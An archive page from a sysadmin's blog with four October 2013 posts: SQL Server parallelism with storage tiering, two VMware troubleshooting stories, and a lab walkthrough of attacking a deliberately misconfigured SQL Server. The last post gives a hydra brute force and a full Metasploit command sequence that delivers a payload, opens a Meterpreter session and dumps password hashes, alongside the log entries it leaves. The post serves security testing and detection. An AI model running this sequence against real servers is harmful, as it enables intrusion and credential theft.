
Monthly Archives: October 2013

SQL Parallelism and Storage Tiering

Sometimes features, independently acceptable on their own, can combine to produce peculiar results.

SQL

SQL parallelism is simply the query optimizer breaking up tasks to different schedulers. A single query can go parallel in several different parts of the query plan. There is a significant cost associated with separating the threads and then re-assembling them so not all queries will go parallel. To find out if queries are going parallel you can take a look at the plan cache.

Since GHz hasn't increased in a long time but core count is going through the roof, it makes sense to have a controller thread delegate to the minions. CXPACKET waits will increase when queries go parallel. Missing indexes and bad queries can also cause queries to go parallel.

The CXPACKET wait is incredibly complex. There are ways to make it go away without really fixing the problem. For example, setting max degree of parallelism (MAXDOP) to 1 will certainly make CXPACKET go away. Raising the cost threshold for parallelism higher than the cost of your queries will also make CXPACKET go away. But the goal isn't to make CXPACKET disappear; the goal is to make queries faster, not to fix the waits.
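To make the two knobs above concrete, here is a deliberately simplified sketch (not the actual optimizer logic) of how the cost threshold and MAXDOP interact when SQL Server decides whether a plan is even eligible to go parallel. The function name and the scheduler count are my own illustration; the defaults shown (cost threshold 5, MAXDOP 0 = unlimited) match out-of-the-box SQL Server settings.

```python
# Conceptual sketch only -- a simplified model of parallel-plan eligibility,
# not SQL Server internals.

def goes_parallel(estimated_cost, cost_threshold=5, max_dop=0, schedulers=8):
    """Return True if a query with this estimated cost is eligible
    for a parallel plan under the given instance settings."""
    if max_dop == 1:      # parallelism disabled instance-wide
        return False
    if schedulers < 2:    # single-core box: nothing to delegate to
        return False
    # Otherwise MAXDOP only caps the degree; eligibility hinges on cost.
    return estimated_cost > cost_threshold

print(goes_parallel(2))              # False: cheap query stays serial
print(goes_parallel(50))             # True: expensive query is eligible
print(goes_parallel(50, max_dop=1))  # False: MAXDOP 1 makes CXPACKET "go away"
```

Note how both "fixes" from the paragraph above show up here: MAXDOP 1 short-circuits everything, and raising the threshold above your query costs flips the last comparison.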

Storage

Recently, in my short career as a SAN admin I have been exposed to automatic storage tiering. With storage tiering we take pools of storage with different performance characteristics and attempt to spread the workload across the different pools' drives. Ideally, the pool's IOPS capability matches the demand for IOPS. Ideally, data that doesn't get accessed often gets put on slower, cheaper storage. Ideally, this reduces the need to identify archive workloads up front because the back-end storage solves most of that problem. Ideally, management will buy enough storage so that everything isn't running on disk pools with archive characteristics. My point is that storage tiering doesn't always work as well as advertised. Storage tiering is a cost-saving maneuver which can cause a lot of inconsistent performance. Inconsistent performance leads to a lot of headaches.

If we combine these two features, some threads of a parallel query could be hitting cheap storage while other minion threads are hitting SSDs. The result is that some threads are fast and others are slow. This will send CXPACKET waits into orbit. When CXPACKET waits are high, they generally mask any other type of system issue. There are many causes of CXPACKET waits, and inconsistent storage performance can be one of them.
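A toy model makes the orbit claim easy to see. Assuming (my simplification, not SQL Server internals) that a parallel query finishes when its slowest worker finishes, CXPACKET accumulates while the fast threads sit waiting for the stragglers:

```python
# Toy model: fast threads wait on the slowest one, and that waiting
# is roughly what CXPACKET measures.

def cxpacket_wait_ms(thread_times_ms):
    """Total time fast threads spend waiting on the slowest thread."""
    slowest = max(thread_times_ms)
    return sum(slowest - t for t in thread_times_ms)

# All threads on the fast tier: even progress, little wait.
print(cxpacket_wait_ms([100, 100, 110, 105]))   # 25 ms

# Two threads land on the slow tier: waits explode.
print(cxpacket_wait_ms([100, 100, 900, 950]))   # 1750 ms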

Parallelism is a feature to alleviate CPU bottlenecks. With storage tiering, the bottlenecks can quickly shift from storage to CPU and back. So the cost increase of going parallel can sometimes be for nothing if a single thread is waiting on storage.

Take Away


I apologize if you came here looking for some kind of recommendation. The fact is, storage tiering can be a nightmare. Performance troubleshooting is an ever-changing game that I am fighting to stay ahead in.


Posted by on October 29, 2013 in SQL Admin, Storage

 

Cannot open the disk: VMWare maintenance mode bug?

Bug? Well, I don't want to jump to conclusions, but I recently saw some less-than-desirable behavior when putting a host into maintenance mode.

In this 3 node cluster I had recently created some larger storage VMs to replace a single VM. Both the old and new guests were running for the parallel upgrade so it doubled my storage requirements for a short period of time.

While this upgrade was happening I needed to do a driver update on the hosts. I planned to put one in maintenance mode near the end of the day and do the driver update the next day. Maintenance mode started without incident and all VMs started vmotioning off of that host.

The next morning I got some complaints that one of the storage VMs was having issues. I checked for vmware error messages but didn't find any. I could ping this VM but I couldn't log in or do anything else with it. I couldn't even send a remote reboot command: shutdown -m \\storagevm /f /r /t 00

The error

I was forced to power the VM off. When I tried to power it on vmware gave me this message: Cannot open the disk ‘/vmfs/volumes/xxxx/vm/vm.vmdk’ or one of the snapshot disks it depends on.

I was stumped. I first thought it was some kind of pathing issue, but that didn't make sense because paths are not defined on hosts individually. While the VM was off I was able to migrate it back to the original host and power it on. This worked, so I was back in business, but I still needed to update that driver. I then tried to manually vmotion this server to the same host and was presented with this slightly more descriptive error: The VM failed to resume on the destination during early power on. Cannot open the disk ‘/vmfs/volumes/xxxx/vm/vm.vmdk’ or one of the snapshot disks it depends on. 0 (Cannot allocate memory)

The problem

What happened next is why I use the b word in my title. The manual vmotion does fail, but the guest stays happy. It continues to run because, instead of forcing itself onto the destination, it hops back to the source host. The previous evening, maintenance mode failed to foresee this problem and rammed my VM onto the host, making it unresponsive. No error or message was presented other than that maintenance mode completed successfully. My VMs running properly is far more important than my maintenance mode completing successfully.

The cause

My problem was a vmware storage limitation. A single host can only have a limited amount of VMDK storage open at once. I do take responsibility for not knowing how close I was to one of these limits. But, in my defense, I just got back from VMworld where they were bragging about 64TB datastores.

This KB was quite helpful and let me know that if I complete my ESXi upgrade I won’t be pushing the limits anymore: http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1004424
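As a rough back-of-the-envelope based on that KB: on the ESXi 5.x builds it covers, each MB of VMFS heap lets a host address roughly 100 GB of open VMDK storage (the default 80 MB heap covers about 8 TB; the 256 MB maximum about 25 TB). These are approximate figures pulled from the KB's examples, so treat the ratio as an assumption:

```python
# Approximate figures from the KB's examples -- an estimate, not a spec.
GB_OPEN_PER_MB_HEAP = 100  # assumed ratio of open VMDK GB per MB of VMFS heap

def max_open_vmdk_tb(heap_size_mb):
    """Approximate TB of open VMDKs a host can address with this heap size."""
    return heap_size_mb * GB_OPEN_PER_MB_HEAP / 1024

print(round(max_open_vmdk_tb(80), 1))   # ~7.8 TB with the default heap
print(round(max_open_vmdk_tb(256), 1))  # ~25.0 TB at the configurable max
```

With a few large storage VMs doubled up for a parallel upgrade, it is easy to see how a 3-node cluster evacuating onto fewer hosts blows through that budget.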

I also found these other two resources useful.

https://communities.vmware.com/thread/451279?start=0&tstart=0


PowerCLI > Get-HardDisk -Datastore | select -ExpandProperty CapacityGB | measure -sum -ave -max -min

http://pibytes.wordpress.com/2012/11/13/esxi-vmfs-heap-size-blockade-for-monster-virtual-machines-in-bladecenter-infrastructure/

 

Posted by on October 13, 2013 in Uncategorized

 

Changing memory for the VM was greater than the available network bandwidth

I recently ran into some strange behavior on one of my virtual hosts. I first noticed that the VMWare console was nearly unusable because it was so slow. It looked like an overly compressed JPEG and mouse clicks were taking forever on all the VMs on that host. RDP worked fine and the VMs didn't seem to have any problems. VMs on identical hosts in the same cluster were not having problems. I attempted to vmotion a VM off of that host and it didn't seem to be progressing. VMs were happy so it wasn't an urgent issue. The next day I came in and was presented with this error:

“The migration was cancelled because the amount of changing memory for the VM was greater than the available network bandwidth”

I’m stuck in a sticky situation. I have a problem with a host, but I can’t move any VMs off of the host because VMotion isn’t working. Since I am new at VMWare administration I ran the problem by a couple co-workers and then opened a ticket with the vendor.

Lead 1: Busy network

When connecting to a vm console, that traffic is managed by the host kernel. VMotion traffic is also handled by the kernel but can be separated from the other traffic. Both of these things were suffering so it seemed to be pretty obvious where my problem was. I suspected a network problem but wasn’t really sure how to troubleshoot the management network traffic.

This KB was relevant but not helpful. 23 Ratings and the average is one star.
http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2009135

This article does some finger pointing at a broader network problem with some general contention. The console was never fast and the VMotions never finished. Support recommended segregating vmotion traffic from kernel traffic in different vlans and port groups, basically trying to solve a general busy-network problem. With only two connections, I could maintain redundancy and segregation by setting one vmnic to active and one to standby, and doing the opposite for the other port group. That would give me the minimum requirement for VMotion: a dedicated 1Gbit connection.

Lead 2: Bad something or other

The performance was consistently slow. That doesn’t describe a contention problem. So the next suggestion was bad driver/firmware/cable. I tried swapping management cables with another host. The problem stayed with this host and not the cables.

So the last option support kept coming back to was a bad driver or firmware. They suggested updating but this causes me problems because I would have to reboot for this to take effect. I can’t reboot because I can’t get the stinking VMs off this host. Also, why the heck do I have 6 identical hosts and only 1 is having this problem???

Important discovery: Direction matters

I started examining the performance with esxtop. I noticed that while these vmotions were running, throughput was staying at a consistent 1 Mbit/sec. That's about 1000 times slower than it should be; VMotion can saturate a 1Gb/sec connection. I also found a new and quite useful tool to graph this information. Visual esxtop is like perfmon for ESX.

http://labs.vmware.com/flings/visualesxtop

I was able to look at each port individually. I began to understand that even though the two NICs were “active/active” in the port group, a single VMotion would only use a single NIC. Out of the blue, against my better judgement I decided to vmotion a VM onto this box. Previously I was focused on getting VMs off of this server. To my surprise the process worked just fine. That is because it hit the second NIC and not the first one.

Resolution: Turn it off and on again

To resolve my issue I went into the vSwitch properties and edited my management port group making the bad NIC standby. I was then able to move all the VMs off this host and reboot. I added the “bad” NIC back into the port group as active and watched a couple VMotions succeed using 950Mbits/sec throughput on that same “bad” NIC.

So the root cause was a single management NIC (1 of 12) acting a bit goofy and requiring a reboot. Not exactly a perfect resolution, but at least I didn't have to cause any downtime for my users.

 

Posted by on October 10, 2013 in Virtual

 

Hacking SQL 2014 CTP1 on Windows Server 2012 R2

I have some priors on this topic here and here, so if this is your first time I highly suggest you check those out, especially my take on ethics here

I wanted to test out the tools to make sure there were not any new gotchas with the latest and greatest versions of MSSQL and Windows Server. At the heart of this hack is brute forcing a SQL Auth account. I didn't expect Microsoft to come up with any additional ways to prevent a server from being misconfigured and allowing this attack. What I wasn't so sure about was whether Microsoft had come up with a way to (a) prevent the payload from executing or (b) prevent the payload from dumping the password hashes.

Here is our lesson plan for today.
1. find an instance
2. brute force an account
3. deliver a payload
4. use meterpreter to dump the hashes
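Before reaching for nmap, step 1 can be sketched with nothing but a TCP connect to SQL Server's default port. This is my own minimal illustration, not what nmap actually does (nmap adds version probes and the TDS pre-login handshake that trips the log entry shown later); it only answers "is something listening?":

```python
# Minimal sketch of instance discovery: a plain TCP connect test.
# The host IP below is just the lab address from this post.
import socket

def port_open(host, port=1433, timeout_s=1.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout_s):
            return True
    except OSError:
        return False

print(port_open("10.10.10.105"))  # e.g. True if the lab instance is listening
```

Because this never sends a TDS packet, it also would not generate the "login packet ... structurally invalid" log entry that nmap's deeper probing does.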

[image: Hacking_MSSQL]

First up is to install SQL Server. We’ll want to install the database engine, which is the service we are going to exploit, and also the management tools to make it super easy to misconfigure. My previous setup used VMWare player for the SQL box which got a little hairy. Turns out VMWare takes a bit to support new Windows operating systems so Hyper-V was a good choice for this test.

[image: install_SQL]

Next up to bat is the boneheaded administrator. Scumbag DBA is going to do a few things to this box to make it super easy for us to deploy our hacker tools. Those misconfigurations include:

1. Local windows administrator service account
2. SQL Auth enabled
3. SQL User with an easy password and the sysadmin server role

[image: misconfigs]

Now that we’re ready to rock and roll I decided to use VMWare player for Kali Linux as my attacker machine. I was able to identify that Microsoft SQL Server was at the other end of port 1433 with nmap.

[image: nmap_01]

This did however trip a very important SQL Log entry. I’m not sure if this is new to SQL 2014 but someone should contact nmap :]

09/28/2013 09:05:18,Logon,Unknown,The login packet used to open the connection is structurally invalid; the connection has been closed. Please contact the vendor of the client library. [CLIENT: 10.10.10.104]
09/28/2013 09:05:18,Logon,Unknown,Error: 17832 Severity: 20 State: 18.

After using the brute force tool “hydra”, we have identified a valid username and password of tom/tom. This generates some more log entries. No surprises here:

09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.104]
09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.
09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.104]
09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.
09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.104]
09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.
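The flip side of this noise is that it is easy to alert on. As a defensive sketch (the function and threshold are my own illustration, and the parsing assumes the comma-separated errorlog format shown above), counting failed logins per client IP turns a hydra run into an obvious signal:

```python
# Sketch: count SQL Server failed-login (error 18456) entries per client IP.
import re
from collections import Counter

FAILED_LOGIN = re.compile(
    r"Login failed for user '(?P<user>[^']+)'.*\[CLIENT: (?P<ip>[\d.]+)\]")

def count_failures(log_lines):
    """Return a Counter of failed-login attempts per client IP."""
    hits = Counter()
    for line in log_lines:
        m = FAILED_LOGIN.search(line)
        if m:
            hits[m.group("ip")] += 1
    return hits

# Two of the three sample lines above carry the 'Login failed' message.
log = [
    "09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.104]",
    "09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.",
    "09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.104]",
]
print(count_failures(log))  # Counter({'10.10.10.104': 2})
```

A real brute force run produces thousands of these per minute from one IP, which is exactly the kind of burst worth paging on.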

Now that we have a valid username and password we can use the metasploit framework to send our payload and attempt to retrieve the hashes. The commands to complete this are:

msfconsole
use exploit/windows/mssql/mssql_payload
set password tom
set username tom
set rhost 10.10.10.105
set lhost 10.10.10.100
exploit
getuid
ps
migrate 2136
hashdump
sysinfo

[image: successful_hashes]

Aaaaaaand we’ve got Build 9200 giving us the goods. Getting the hashes allows for lateral movement. All SQL servers on the same domain could very well be at risk now that one SQL Server has been taken advantage of. The key here is to avoid the misconfigurations on ALL servers.

This malicious activity does generate some more notable log activity. Notice that we never enabled xp_cmdshell; the delivery of the payload did that for us.

09/29/2013 09:27:22,spid55,Unknown,Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
09/29/2013 09:27:22,spid55,Unknown,Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
09/29/2013 09:27:22,spid55,Unknown,SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell' search for 'xp_cmdshell' in SQL Server Books Online.

The goal here is to help everyone be more secure by identifying and testing some basic misconfigurations. We’ve proved that patching alone won’t protect you from all evils.

 

Posted by on October 1, 2013 in Network Admin, Security, SQL Admin